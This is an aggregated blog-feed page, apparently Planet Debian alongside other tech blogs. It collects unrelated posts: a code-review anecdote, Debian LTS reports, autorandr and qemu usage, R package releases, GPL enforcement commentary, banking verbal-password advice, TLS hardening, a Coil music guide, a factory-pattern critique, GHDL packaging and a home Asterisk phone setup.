That afternoon, Raquel's favorite type of ticket came in: a nice easy feature add for the monitoring program. It'd require a new method in the library and a handler for the Nagios plugin; it was perfect for John to get his feet wet. She assigned it to him and attached a link to a method in the library that was about 97% similar to what was needed, for him to study (read: copy and paste).

Several days slipped past in silence. Since there'd been no commits, Raquel dropped John a note to say that her contract was almost up. If he wanted a code review, he should push his changes and let her know.

John replied that the code was "almost complete" and would be checked in "shortly."

Fair enough, Raquel figured, and let it go.

Her second-to-last day, John sent a note saying he'd checked in his changes. He also included a link—to a different git repo.

Maybe it's a fork? No such luck. It was a brand new repo with exactly 1 commit. Not only had John made a new repo, that repo contained both the library code and the Nagios plugin code, with no submodules in sight.

Raquel could hardly believe it. How am I supposed to review without a diff?

She set up another WebEx for early the next morning—her last day—and explained to John how the lack of history was a critical problem. He agreed with her and assured her she'd get the diff she wanted.

Now what, dear reader, do you think Raquel actually received? If you guessed an email with bullet points outlining "At line 75 in foo.pl, I changed A to B. At line 89 I changed C to D ...", you're today's lucky winner.

Glancing at the clock, Raquel decided she had time for one last good deed before departing forever. She ran diff on the 2 repos, then typed up a polite, precise email outlining her comments. John's code wasn't all that bad really; he needed to code more defensively, since the storage system would sometimes throw errors, and he probably shouldn't loop over output that would always be exactly 0 or 1 lines of code, but it functioned well enough. Oh yeah, and the big chunk in the middle of the original method that he'd elected not to copy over? That handled the fact that the storage system was a cluster, so you may not be on the host you want when you first SSH into the machine. But otherwise, it was decent code.

Raquel's final email arrived soon after that, from John's manager. Apparently, John had complained that she was unprofessional.

She wrote back to wish them both the best of luck, collected her things, and laughed her way home.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianLucas Kanashiro: My Debian LTS work on October

In this post I describe the work that I’ve done until the end of October in the context of the Debian LTS team. This month I was allocated 5h and spent just 2h of them because I have written my master’s qualification text (I am almost on my deadline to finish it). During November I intend to finish these 3h pending, so I did not request more hours.

I basically worked with CVE-2017-0903 which is an issue related to YAML deserialization of gem specifications that could allow one execute remote code. Two packages in wheezy could be affected by this security vulnerability, rubygems and ruby1.9.1. The issue affects just RubyGems source code, but before Ruby version 1.9.1 it was maintained in a separated package, after that it was incorporated by ruby interpreter source package.

After carefully read the upstream blogpost and reviewed the commit that intruduced this vulnerability, I was able to figure out whether the mentioned packages were affected or not. The modification was not present in both of them, and after some tests I did confirm that those versions of rubygems were not affected. The two packages were marked as not affected by CVE-2017-0903 in wheezy.

Well, this was the summary of my activities in the Debian LTS team in October. See you next month :)

Planet DebianDon Armstrong: Autorandr: automatically adjust screen layout

Like many laptop users, I often plug my laptop into different monitor setups (multiple monitors at my desk, projector when presenting, etc.) Running xrandr commands or clicking through interfaces gets tedious, and writing scripts isn't much better.

Recently, I ran across autorandr, which detects attached monitors using EDID (and other settings), saves xrandr configurations, and restores them. It can also run arbitrary scripts when a particular configuration is loaded. I've packed it, and it is currently waiting in NEW. If you can't wait, the deb is here and the git repo is here.

To use it, simply install the package, and create your initial configuration (in my case, undocked):

 autorandr --save undocked

then, dock your laptop (or plug in your external monitor(s)), change the configuration using xrandr (or whatever you use), and save your new configuration (in my case, workstation):

autorandr --save workstation

repeat for any additional configurations you have (or as you find new configurations).

Autorandr has udev, systemd, and pm-utils hooks, and autorandr --change should be run any time that new displays appear. You can also run autorandr --change or autorandr --load workstation manually too if you need to. You can also add your own ~/.config/autorandr/$PROFILE/postswitch script to run after a configuration is loaded. Since I run i3, my workstation configuration looks like this:

 #!/bin/bash

 xrandr --dpi 92
 xrandr --output DP2-2 --primary
 i3-msg '[workspace="^(1|4|6)"] move workspace to output DP2-2;'
 i3-msg '[workspace="^(2|5|9)"] move workspace to output DP2-3;'
 i3-msg '[workspace="^(3|8)"] move workspace to output DP2-1;'

which fixes the dpi appropriately, sets the primary screen (possibly not needed?), and moves the i3 workspaces about. You can also arrange for configurations to never be run by adding a block hook in the profile directory.

Check it out if you change your monitor configuration regularly!

Planet DebianRogério Brito: Some activities of the day

Yesterday, I printed the first draft of the first chapter when my little boy was here and he was impressed with this strange object called a "printer". Before I printed what I needed, I fired up LibreOffice and chose the biggest font size that was available and let him type his first name by himself. He was quicker than I thought with a keyboard. After seeing me print his first name, he was jumping up and down with joy of having created something and even showed grandma and grandpa what he had done.

He, then, wanted more and I taught him how to use that backspace key, what it meant and he wanted to type his full name. I let him and taught him that there is a key called space that he should type every time he wants to start a new word and, in the end, he typed his first two names. To my surprise, he memorized the icon with the printer (which I must say that I have to hunt every time, since it seems so similar to the adjacent ones!) and pressed this new key called "Enter". When he pressed, he wasn't expecting the printer on his right to start making noises and printing his name.

He was so excited and it was so nice to see his reaction full of joy to get a job done!

I am thinking of getting a spare computer, building it with him and for him, so that he can call it his computer every time he comes to see daddy. As a serendipitous situation, Packt Publishing offered yesterday their title "Python Projects for Kids". Unfortunately, he does not yet know how to read, but I guess that the right age is coming soon, which is a good thing to make him be educated "the right way" (that is, with the best support, teaching and patience that I can give him).

Anyway, I printed the first draft of the first chapter and today I have to turn it in.

As I write this, I am downloading a virtual machine from Microsoft to try to install Java on it. Let me see if it works. I have none of the virtualization options used, tough the closest seems to be virtualbox.

Let me cross my fingers.

In other news, I updated some of the tags of very old posts of this blog, and I am seriously thinking about switching from [ikiwiki][0] to another blog platform. It is slow, very slow on my system with the repositories that I have, especially on my armel system. Some non-interpreted system would be best, but I don't know if such a thing even exists. But the killer problem is that it doesn't support easily the typing of Mathematics (even though a 3rd party plugin for MathJax exists).

On the other hand, I just received an answer on twitter from @telegram and it was nice:

Hello, Telegram supports bold and italic. You can type **bold** and __italic__. On mobile, you can also highlight text for this as well.

It is nice that this works with telegram-desktop too.

Besides that, I filed some bugs on Debian's BTS, responded to some issues on my projects on GitHub (I'm slowly getting back on maintaining things) and file wishlist bugs on some other projects.

Oh, and I grabbed a copy of "Wonder woman" ("Mulher Maravilha") and "Despicable Me 3" ("Meu Malvado Favorito 3") dubbed in Brazilian Portuguese for my son. I have to convert the audio from AAC-LC in 6 channels to AC3 or to stereo. Otherwise, my TVs have problem with the videos (one refuses to play the entire file and another plays the audio with sounds of hiccups).

Edit: After converting the VirtualBox image taken from Microsoft, I could easily use qemu/kvm to create screenshots of the installation of Java. The command that I used (for future reference) is:

qemu-system-x86_64 -enable-kvm -m 4096 -smp 2 -net nic,model=e1000 -net user -soundhw ac97 -drive index=0,media=disk,cache=unsafe,file=win7.qcow2

Edit: Fixed some typos.

Planet DebianDirk Eddelbuettel: RcppQuantuccia 0.0.2

A first maintenance release of RcppQuantuccia got to CRAN earlier today.

RcppQuantuccia brings the Quantuccia header-only subset / variant of QuantLib to R. At present it mostly offers calendaring, but Quantuccia just got a decent amount of new functions so hopefully we can offer more here too.

This release was motivated by the upcoming Rcpp release which will deprecate the okd Date and Datetime vectors in favours of newer ones. So this release of RcppQuantuccia switches to the newer ones.

Other changes are below:

Changes in version 0.0.2 (2017-11-06)

  • Added calendars for Canada, China, Germany, Japan and United Kingdom.

  • Added bespoke and joint calendars.

  • Using new date(time) vectors (#6).

Courtesy of CRANberries, there is also a diffstat report relative to the previous release. More information is on the RcppQuantuccia page. Issues and bugreports should go to the GitHub issue tracker.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Harald WelteSFLC sues SFC over trademark infringement

As the Software Freedom Conservancy (SFC) has publicly disclosed on their website, it appears that Software Freedom Law Center (SFLC) has filed for a trademark infringement lawsuit against SFC.

SFLC has launched SFC in 2006, and SFLC has helped and endorsed SFC in the past.

This lawsuit is hard to believe. What has this community come to, if its various members - who used all to be respected equally - start filing law suits against each other?

It's of course not known what kind of negotiations might have happened out-of-court before an actual lawsuit has been filed. Nevertheless, one would have hoped that people are able to talk to each other, and that the mutual respect for working at different aspects and with possibly slightly different strategies would have resulted in a less confrontational approach to resolving any dispute.

To me, this story just looks like there can only be losers on all sides, by far not just limited to the two entities in question.

On lwn.net some people, including high-ranking members of the FOSS community have started to spread conspiracy theories as to whether there's any secret scheming behind the scenes, particularly from the Linux Foundation towards SFLC to cause trouble towards the SFC and their possibly-not-overly-enjoyed-by-everyone enforcement activities.

I think this is complete rubbish. Neither have I ever had the impression that the LF is completely opposed to license enforcement to begin with, nor do I have remotely enough phantasy to see them engage in such malicious scheming.

What motivates SFLC and/or Eben to attack their former offspring is however unexplainable to the bystander. One hopes there is no connection to his departure from FSF about one year ago, where he served as general counsel for more than two decades.

Harald WelteOn the Linux Kernel Enforcement Statement

I'm late with covering this here, but work overload is having its toll on my ability to blog.

On October 16th, key Linux Kernel developers have released and anounced the Linux Kernel Community Enforcement Statemnt.

In its actual text, those key kernel developers cover

  • compliance with the reciprocal sharing obligations of GPLv2 is critical and mandatory
  • acknowledgement to the right to enforce
  • expression of interest to ensure that enforcement actions are conducted in a manner beneficial to the larger community
  • a method to provide reinstatement of rights after ceasing a license violation (see below)
  • that legal action is a last resort
  • that after resolving any non-compliance, the formerly incompliant user is welcome to the community

I wholeheartedly agree with those. This should be no surprise as I've been one of the initiators and signatories of the earlier statement of the netfilter project on GPL enforcement.

On the reinstatement of rights

The enforcement statement then specifically expresses the view of the signatories on the specific aspect of the license termination. Particularly in the US, among legal scholars there is a strong opinion that if the rights under the GPLv2 are terminated due to non-compliance, the infringing entity needs an explicit reinstatement of rights from the copyright holder. The enforcement statement now basically states that the signatories believe the rights should automatically be re-instated if the license violation ceases within 30 days of being notified of the license violation

To people like me living in the European (and particularly German) legal framework, this has very little to no implications. It has been the major legal position that any user, even an infringing user can automatically obtain a new license as soon as he no longer violates. He just (really or imaginary) obtains a new copy of the source code, at which time he again gets a new license from the copyright holders, as long as he fulfills the license conditions.

So my personal opinion as a non-legal person active in GPL compliance on the reinstatement statement is that it changes little to nothing regarding the jurisdiction that I operate in. It merely expresses that other developers express their intent and interest to a similar approach in other jurisdictions.

Krebs on SecuritySimple Banking Security Tip: Verbal Passwords

There was a time when I was content to let my bank authenticate me over the phone by asking for some personal identifiers (SSN/DOB) that are broadly for sale in the cybercrime underground. At some point, however, I decided this wasn’t acceptable for institutions that held significant chunks of our money, and I began taking our business away from those that wouldn’t let me add a simple verbal passphrase that needed to be uttered before any account details could be discussed over the phone.

Most financial institutions will let customers add verbal passwords or personal identification numbers (PINs) that are separate from any other PIN or online banking password you might use, although few will advertise this.

Even so, many institutions don’t properly train their customer support staff (or have high turnover in that department). This can allow clever and insistent crooks to coax customer service reps into validating the call with just the SSN and/or date of birth, or requiring the correct answers to so-called knowledge-based authentication (KBA) questions.

As noted in several stories here previously, identity thieves can reliably work around KBA because it involves answering  questions about things like previous loans, addresses and co-residents — information that can often be gleaned from online services or social media.

A few years ago, I began testing financial institutions that held our personal assets. I was pleasantly surprised to discover that most of them were happy to add a PIN or pass phrase to the account. But many of the customer service personnel at those institutions failed in their responses when I called in and said I didn’t remember the phrase and was there any other way they could verify that I was me?

Ultimately, I ended up moving our investments to an institution that consistently adhered to my requirements. Namely, that failing to provide the pass phrase required an in-person visit to a bank branch to continue the transaction, at which time ID would be requested. Their customer service folks consistently asked the right questions, and weren’t interested in being much helpful otherwise (I’m not going to name the institution for obvious reasons).

Not sure whether your financial institution supports verbal passwords? Ask them. If they agree to set one up for you, take a moment or two over the next few days to call in and see if you can get the customer service folks at that institution to talk about your account without hearing that password.

While a great many people are willing to trade security for more convenience, it’s nice when those of us who are paranoid can opt-in for more security. A great, recent example of this is Google‘s optional “advanced protection” feature, which makes it much harder for password thieves to hack into your Gmail, Drive or other Google properties — even if the attackers already know your password.

“The opt-in, ultra-secure mode is intended for truly high-risk users, including those who face the threat of state-sponsored, highly resourced cyberespionage,” writes Andy Greenberg for Wired. “Think politicians and officials, high net-worth individuals, activists, dissidents, and journalists.”

Greenberg continues:

“As such, it’s a strict and unforgiving system, designed to reinforce every possible weak link that hackers could use to hijack your account. Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google’s malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you’ll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google’s other safeguards.”

Gartner fraud analyst Avivah Litan says she has long relied on verbal passwords for her most important accounts.

“I think a verbal password is a good step and definitely adds more security than does KBA built on top of heavily compromised credit bureau and life history data,” Litan said. Plus it’s free and convenient.  It’s of course not perfect and consumers should try to use verbal passwords that are unique for them and which they don’t use for online passwords —  in case the latter have been compromised by hackers.”

Verbal passwords should not be confused with voice biometrics, a technology some financial institutions are now adopting that can help authenticate customers while profiling and blocking fraudsters who repeatedly call in to customer service representatives. Even if your institution offers voice biometrics, adding a verbal password/passphrase is still a good idea.

Julie Conroy, research director at market research firm Aite Group, said financial institutions are still very concerned about putting up too many hurdles for good customers, so many are treading lightly on verbal passwords.

“Many FIs are moving in the direction of not just asking for the password, but also behind the scenes they are performing analysis of the call characteristics as well as the consumer’s voice print,” Conroy said.

Have you asked your financial institution(s) to add a unique verbal password/passphrase for your most important accounts? If so, sound off about your experience in the comments below.

Planet DebianJames Bromberger: Web Security 2017

I started web development around late 1994. Some of my earliest paid web work is still online (dated June 1995). Clearly, that was a simpler time for content! I went on to be ‘Webmaster’ (yes, for those joining us in the last decade, that was a job title once) for UWA, and then for Hartley Poynton/JDV.com at time when security became important as commerce boomed online.

At the dawn of the web era, the consideration of backwards compatibility with older web clients (browsers) was deemed to be important; content had to degrade nicely, even without any CSS being applied. As the years stretched out, the legacy became longer and longer. Until now.

In mid-2018, the Payment Card Industry (PCI) Data Security Standard (DSS) 3.2 comes into effect, requiring card holder environments to use (at minimum) TLS 1.2 for the encrypted transfer of data. Of course, that’s also the maximum version typically available today (TLS 1.3 is in draft 21 at this point in time of writing). This effort by the PCI is forcing people to adopt new browsers that can do the TLS 1.2 protocol (and the encryption ciphers that permits), typically by running modern/recent Chrome, Firefox, Safari or Edge browsers. And for the majority of people, Chrome is their choice, and the majority of those are all auto-updating on every release.

Many are pushing to be compliant with the 2018 PCI DSS 3.2 as early as possible; your logging of negotiated protocols and ciphers will show if your client base is ready as well. I’ve already worked with one government agency to demonstrate they were ready, and have already helped disable TLS 1.0 and 1.1 on their public facing web sites (and previously SSL v3). We’ve removed RC4 ciphers, 3DES ciphers, and enabled ephemeral key ciphers to provide forward secrecy.

Web developers (writing Javascript and using various frameworks) can rejoice — the age of having to support legacy MS IE 6/7/8/9/10 is pretty much over. None of those browsers support TLS 1.2 out of the box (IE 10 can turn this on, but for some reason, it is off by default). This makes Javascript code smaller as it doesn’t have to have conditional code to work with the quirks of those older clients.

But as we find ourselves with modern clients, we can now ask those clients to be complicit in our attempts to secure the content we serve. They understand modern security constructs such as Content Security Policies and other HTTP security-related headers.

There’s two tools I am currently using to help in this battle to improve web security. One is SSLLabs.com, the work of Ivan Ristić (and now owned/sponsored by Qualys). This tool gives a good view of the encryption in flight (protocols, ciphers), chain of trust (certificate), and a new addition of checking DNS records for CAA records (which I and others piled on a feature request for AWS Route53 to support). The second tool is Scott Helm’s SecurityHeaders.io, which looks at the HTTP headers that web content uses to ask browsers to enforce security on the client side.

There’s a really important reason why these tools are good; they are maintained. As new recommendations on ciphers, protocols, signature algorithms or other actions become recommended, they’re updated on these tools. And these tools are produced by very small, but agile teams — like one person teams, without the bureaucracy (and lag) associated with large enterprise tools. But these shouldn’t be used blindly. These services make suggestions, and you should research them yourselves. For some, not all the recommendations may meet your personal risk profile. Personally, I’m uncomfortable with Public-Key-Pins, so that can wait for a while — indeed, Chrome has now signalled they will drop this.

So while PCI is hitting merchants with their DSS-compliance stick (and making it plainly obvious what they have to do), we’re getting a side-effect of having a concrete reason for drawing a line under where our backward compatibility must stretch back to, and the ability to have the web client assist in ensure security of content.

TEDWatch Facebook Live sessions, live from TEDWomen in New Orleans

Join us for four in-depth conversations over two days, live from the Blue Room at TEDWomen, hosted by podcaster Manoush Zomorodi. Guests include TEDWomen speakers Gretchen Carlson, Sally Kohn, Cleo Wade and Justin Baldoni. Find them all on Facebook at facebook.com/TED — or get direct links below to each super-worthwhile conversation

Facebook Live with Gretchen Carlson
Broadcast journalist Gretchen Carlson joins us for a newsworthy interview about sexual harassment and assault in the workplace and what we can do to end it.

Facebook Live with Sally Kohn
Political pundit Sally Kohn talks with Manoush about media bias and the challenge of reporting news that speaks to both sides.

Facebook Live with Cleo Wade
Artist and poet Cleo Wade joins Manoush in the Blue Room for an interview about finding your voice and using your power to create change.

Facebook Live with Justin Baldoni
Actor Justin Baldoni from CW’s Jane the Virgin talks with Manoush about challenging gender stereotypes, redefining masculinity, and working together to end sexism.


Planet DebianJonathan Dowland: Coil

Peter Christopherson and Jhonn Balance, from [Santa Sangre](https://santasangremagazine.wordpress.com/2014/11/16/the-angelic-conversation-in-remembrance-of-coil/)

Peter Christopherson and Jhonn Balance, from Santa Sangre

A friend asked me to suggest five tracks by Coil that gave an introduction to their work. Trying to summarize Coil in 5 tracks is tough. I think it's probably impossible to fairly summarize Coil with any subset of their music, for two reasons.

Firstly, their music was the output of their work but I don't think is really the whole of the work itself. There's a real mystique around them. They were deeply interested in arcania, old magic, Aleister Crowley, scatology; they were both openly and happily gay and their work sometimes explored their experiences in various related underground scenes and sub-cultures; they lost friends to HIV/AIDS and that had a profound impact on them. They had a big influence on some people who discovered them who were exploring their own sexualities at the time and might have felt excluded from mainstream society. They frequently explored drugs, meditation and other ways to try to expand and open their minds; occultism. They were also fiercely anti-commercial, their stuff was released in limited quantities across a multitude of different music labels, often under different names, and often paired with odd physical objects, runes, vials of blood, etc. Later fascinations included paganism and moon worship. I read somewhere that they literally cursed one of their albums.

Secondly, part of their "signature" was the lack of any consistency in their work, or to put it another way, their style over time varied enormously. I'm also not necessarily well-versed in all their stuff, I'm part way on this journey myself... but these are tracks which stand out at least from the subset I've listened to.

Both original/core members of Coil have passed away and the legal status of their catalogue is in a state of limbo. Some of these songs are available on currently-in-print releases, but all such releases are under dispute by some associate or other.

1. Heaven's Blade

Like (probably) a lot of Coil songs, this one exists in multiple forms, with some dispute about which are canonical, which are officially sanctioned, etc. the video linked above actually contains 5 different versions, but I've linked to a time offset to the 4th: "Heaven's Blade (Backwards)". This version was the last to come to light with the recent release of "Backwards", an album originally prepared in the 90s at Trent Reznor's Nothing Studios in New Orleans, but not finished or released. The circumstances around its present-day release, as well as who did what to it and what manipulation may have been performed to the audio a long time after the two core members had passed, is a current topic in fan circles.

Despite that, this is my preferred version. You can choose to investigate the others, or not, at your own discretion.

2. how to destroy angels (ritual music for the accumulation of male sexual energy)

A few years ago, "guidopaparazzi", a user at the Echoing the Sound music message board attempted to listen to every Coil release ever made and document the process. He didn't do it chronologically, leaving the EPs until near the end, which is when he tackled this one (which was the first release by Coil, and was the inspiration behind the naming of Trent Reznor's one-time side project "How To Destroy Angels").

Guido seemed to think this was some kind of elaborate joke. Personally I think it's a serious piece and there's something to it but this just goes to show, different people can take things in entirely different ways. Here's Guido's review, and you can find the rest of his reviews linked from that one if you wish.

https://archive.org/details/Coil-HowToDestroyAngels1984

3. Red Birds Will Fly Out Of The East And Destroy Paris In A Night

Both "Musick To Play In The Dark" volumes (one and two) are generally regarded as amongst the most accessible entry points to the Coil discography. This is my choice of cut from volume 1.

For some reason this reminds me a little of some of the background music from the game "Unreal Tournament". I haven't played that in at least 15 years. I should go back and see if I can figure out why it does.

The whole EP is worth a listen, especially at night.

https://archive.org/details/CoilMusickToPlayInTheDarkVol1/Coil+-+Musick+To+Play+In+The+Dark+Vol+1+-+2+Red+Birds+Will+Fly+Out+Of+The+East+And+Destroy+Paris+In+A+Night.flac

4. Things Happen

It's tricky to pick a track from either "Love's Secret Domain" or "Horse Rotorvator"; there are other choices which I think are better known and loved than this one but it's one that haunted me after I first heard it for one reason or another, so here it is.

5. The Anal Staircase

Track 1 from Horse Rotorvator. What the heck is a Horse Rotorvator anyway? I think it was supposed to have been a lucid nightmare experienced by the vocalist Jhonn Balance. So here they wrote a song about anal sex. No messing about, no allusion particularly, but why should there be?

https://archive.org/details/CoilHorseRotorvator2001Remaster/Coil+-+Horse+Rotorvator+%5B2001+remaster%5D+-+01+The+Anal+Staircase.flac

Bonus 6th: 7-Methoxy-B-Carboline (Telepathine)

From the drone album "Time Machines", which has just been re-issued by DIAS records, who describe it as "authorized". Each track is titled by the specific combination of compounds that inspired its composition, supposedly. Or, perhaps it's a "recommended dosing" for listening along.

https://archive.org/details/TimeMachines-TimeMachines

Post-script

If those piqued your interest, there's some decent words and a list of album suggestions in this Vinyl Factory article.

Finally, if you can track them down, Stuart Maconie had two radio shows about Coil on his "Freak Zone" programme. The main show discusses the release of "Backwards", including an interview with collaborator Danny Hyde, who was the main person behind the recent re-issue. The shorter show is entitled John Doran uncoils Coil. Guest John Doran from The Quietus discusses the group and their history interspersed with Coil tracks and tracks from their contemporaries. Interestingly they chose a completely different set of 5 tracks to me.

Worse Than FailureCodeSOD: The Distract Factory Pattern

The Gang-of-Four design patterns have an entire category of creational patterns, to handle the complexities of creating objects. And yes, it can get complicated, especially when we think in terms of the single-responsibility principle. Often, creating an instance of an class is itself so complex that we need a new class to do it.

Thus, we have the Factory pattern. And the Abstract Factory Pattern. And the Abstract Factory Factory Abstract Provider Bean pattern, if you’re using Spring. The purpose of these patterns is to add indirection between the client, calling code, and the creation of the objects- different concrete implementations can be instantiated, without the client code needing to worry about what actual type it received. Polymorphism wins the day. Code is more loosely coupled, because the client code never needs to name the concrete type it uses.

Unless you want to do it wrong, in which case Jen M found this particular solution:

public abstract class TaskBase
{
        public static TaskBase CreateInstance(
                Manager manager,
                Type TaskType)
        {
                object[] args = {manager, -1};

                return Activator.CreateInstance(TaskType, args) as TaskBase;
        }

        public static TaskBase CreateInstance(
                Manager manager,
                int taskId,
                string fullyQualifiedTypeName)
        {
                var TaskType = TypeLoader.GetType(fullyQualifiedTypeName, true);

                object[] args = {manager, taskId};

                var taskInstance = Activator.CreateInstance(TaskType, args) as TaskBase;

                return taskInstance;
        }
}

In this version, you can specify the concrete child of TaskBase that you want an instance of, and this will helpfully call the constructor for you. That means you could write:

var task = TaskBase.CreateInstance(mgr, TypeOf(MyDll.MyPackage.BasicTask))

Which is obviously far more loosely coupled than:

var task = new BasicTask(mgr);

As Jen puts it: “Some of the code I see makes me want to quit my job and go hunt down the people who wrote it. This is one of those instances.” Instead, Jen replaced this code with an actual version of the Factory pattern.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet DebianAndreas Bombe: Reviving GHDL in Debian

It has been a few years since Debian last had a working VHDL simulator in the archive. Its competitor Verilog has been covered by the iverilog and verilator simulator packages, but GHDL was the only option for VHDL in Debian and that has become broken, orphaned and was eventually removed. I have just submitted an ITP to make my work on it official.

A lot has changed since the last Debian upload of GHDL. Upstream development is quite active and it has gained free reimplementations of the standard library definitions (the lack of which frustrated at least two attempts at adoption of the Debian package). It has gained additional backends, in addition to GCC it can now also use LLVM and its own custom mcode (x86 only) code generator. The mcode backend should provide faster compilation at the expense of lacking sophisticated optimization, hence it might be preferable over the other two for small projects.

My intentions are to provide all three backends in separate packages which would also offer easier backend troubleshooting—a user experiencing problems can simply install another package to try a different backend. The problem with that idea is that GHDL is not designed for that kind of parallel installation. The backend is chosen at build configure time and that configuration is built and installed. Parallel installation will probably need some development but if that would turn out to be much work I could always have the packages conflicting initially.

Given all these changes I am redoing the Debianization from ground up and maybe take bits and pieces from the old packaging where suitable. Right now I’m building the different backends to compare and see what files are backend specific and what can go into a common package.

Planet DebianJohn Goerzen: The Yellow House Phone Company (Featuring Asterisk and an 11-year-old)

“Well Jacob, do you think we should set up our own pretend phone company in the house?”

“We can DO THAT?”

“Yes!”

“Then… yes. Yes! YES YES YESYESYESYES YES! Let’s do it, dad!”

Not long ago, my parents had dug up the old phone I used back in the day. We still have a landline, and Jacob was having fun discovering how an analog phone works. I told him about the special number he could call to get the time and temperature read out to him. He discovered what happens if you call your own number and hang up. He figured out how to play “Mary Had a Little Lamb” using touchtone keys (after a slightly concerned lecture from me setting out some rules to make sure his “musical dialing” wouldn’t result in any, well, dialing.)

He was hooked. So I thought that taking it to the next level would be a good thing for a rainy day. I have run Asterisk before, though I had unfortunately gotten rid of most of my equipment some time back. But I found a great deal on a Cisco 186 ATA (Analog Telephone Adapter). It has two FXS lines (FXS ports simulate the phone company, and provide dialtone and ring voltage to a connected phone), and of course hooks up to the LAN.

We plugged that in, and Jacob was amazed to see its web interface come up. I had to figure out how to configure it (unfortunately, it uses SCCP rather than SIP, and figuring out Asterisk’s chan_skinny took some doing, but we got there.)

I set up voicemail. He loved it. He promptly figured out how to record his own greetings. We set up a second phone on the other line, so he could call between them. The cordless phones in our house support SIP, so I configured one of them as a third line. He spent a long time leaving himself messages.

IMG_3465

Pretty soon we both started having ideas. I set up extension 777, where he could call for the time. Then he wanted a way to get the weather forecast. Well, weather-util generates a text-based report. With it, a little sed and grep tweaking, the espeak TTS engine, and a little help from sox, I had a shell script worked up that would read back a forecast whenever he called a certain extension. He was super excited! “That’s great, dad! Can it also read weather alerts too?” Sure! weather-util has a nice option just for that. Both boys cackled as the system tried to read out the NWS header (their timestamps like 201711031258 started with “two hundred one billion…”)

Then I found an online source for streaming NOAA Weather Radio feeds – Jacob enjoys listening to weather radio – and I set up another extension he could call to listen to that. More delight!

But it really took off when I asked him, “Would you like to record your own menu?” “You mean those things where it says press 1 or 2 for this or that?” “Yes.” “WE CAN DO THAT?” “Oh yes!” “YES, LET’S DO IT RIGHT NOW!”

So he recorded a menu, then came and hovered by me while I hacked up extensions.conf, then eagerly went back to the phone to try it. Oh the excitement of hearing hisown voice, and finding that it worked! Pretty soon he was designing sub-menus (“OK Dad, so we’ll set it up so people can press 2 for the weather, and then choose if they want weather radio or the weather report. I’m recording that now. Got it?”)

He has informed me that next Saturday we will build an intercom system “like we have at school.” I’m going to have to have some ideas on how to tie Squeezebox in with Asterisk to make that happen, I think. Maybe this will do.

,

Planet DebianThorsten Alteholz: My Debian Activities in October 2017

FTP assistant

Again, this month almost the same numbers as last month appeared in the statistics. I accepted 214 packages and rejected 22 uploads. The overall number of packages that got accepted this month was only 339.

Debian LTS

This was my fortieth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

This month my all in all workload has been 20.75h. During that time I did LTS uploads of:

  • [DLA 1125-1] botan1.10 security update for one CVE
  • [DLA 1127-1] sam2p security update for 6 CVEs
  • [DLA 1143-1] curl security update for one CVE
  • [DLA 1149-1] wget security update for two CVEs

I also took care of radare2 twice and marked all four CVEs as not-affected for Wheezy and Jessie. As nobody else wanted to address the issues in wireshark yet, I now started to work on this package.

Last but not least I did one week of frontdesk duties.

Other stuff

During October I took care of some bugs and at one go uploaded new upstream versions of hoel and duktape (this had to be done twice as I introduced an new bug with the first upload :-(). I only fixed bugs in glewlwyd and smstools. This month I also sponsored an upload of printrun.

After about ten years of living without any power outage, some construction worker decided to cut a cable near my place. Unfortunately one of my computers used for recording TV shows did not boot after the cable had been repaired and I had to switch some timers to other boxes. All in all this was too much stress and I purchased some USVs from APC. As apcupsd was orphaned, I took the opportunity to adopt it as DOPOM for this month.

My license pasting project now contains 31 license templates for your debian/copyright. The list of available texts can be obtained with:

curl http://licapi.debian.net/template

The license text itself is available under the given links, for example with

curl http://licapi.debian.net/template/Apache-2

  • http://licapi.debian.net/template/Apache-2
  • http://licapi.debian.net/template/Artistic-2.0
  • http://licapi.debian.net/template/BSL-1.0
  • http://licapi.debian.net/template/CC0
  • http://licapi.debian.net/template/CC-BY-3.0
  • http://licapi.debian.net/template/CC-BY-4.0
  • http://licapi.debian.net/template/CC-BY-SA-3.0
  • http://licapi.debian.net/template/CC-BY-SA-4.0
  • http://licapi.debian.net/template/Cygwin
  • http://licapi.debian.net/template/EPL-1.0
  • http://licapi.debian.net/template/Expat
  • http://licapi.debian.net/template/GPL-2
  • http://licapi.debian.net/template/GPL-2+
  • http://licapi.debian.net/template/GPL-3
  • http://licapi.debian.net/template/GPL-3+
  • http://licapi.debian.net/template/ISC
  • http://licapi.debian.net/template/LGPL-2
  • http://licapi.debian.net/template/LGPL-2+
  • http://licapi.debian.net/template/LGPL-2.1
  • http://licapi.debian.net/template/LGPL-2.1+
  • http://licapi.debian.net/template/LGPL-3
  • http://licapi.debian.net/template/LGPL-3+
  • http://licapi.debian.net/template/LPPL-1.2
  • http://licapi.debian.net/template/LPPL-1.3a
  • http://licapi.debian.net/template/LPPL-1.3c
  • http://licapi.debian.net/template/MPL-1.0
  • http://licapi.debian.net/template/MPL-1.1
  • http://licapi.debian.net/template/MPL-2.0
  • http://licapi.debian.net/template/OFL-1.0
  • http://licapi.debian.net/template/OFL-1.1
  • http://licapi.debian.net/template/Zlib

Planet DebianDirk Eddelbuettel: pinp 0.0.4: Small tweak

A maintenance release of our pinp package for snazzier one or two column vignettes is now on CRAN as of yesterday.

In version 0.0.3, we disabled the default \pnasbreak command we inherit from the PNAS LaTeX style. That change turns out to have been too drastic. So we reverted yet added a new YAML front-matter option skip_final_break which, if set to TRUE, will skip this break. With a default value of FALSE we maintain prior behaviour.

A screenshot of the package vignette can be seen below. Additional screenshots of are at the pinp page.

The NEWS entry for this release follows.

Changes in pinp version 0.0.4 (2017-11-04)

  • Correct NEWS headers from 'tint' to 'pinp' (#45).

  • New front-matter variables ‘skip_final_break’ skips the \pnasbreak on final page which back as default (#47).

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the tint page. For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

